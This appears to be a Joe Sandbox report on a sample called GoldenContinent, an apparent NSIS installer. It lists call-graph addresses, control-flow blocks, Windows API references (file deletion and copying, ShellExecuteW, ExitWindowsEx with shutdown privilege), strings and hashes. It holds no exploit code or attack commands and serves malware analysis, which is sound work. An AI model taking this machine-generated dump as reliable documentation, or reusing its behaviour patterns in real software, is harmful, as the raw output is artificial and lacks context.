4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                              • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                            • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                            • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                            • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                            • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                            • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                            • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                            • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                            • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                            • String ID: jF
                                                                                                                                                                                                                                                                            • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                            • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                            • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
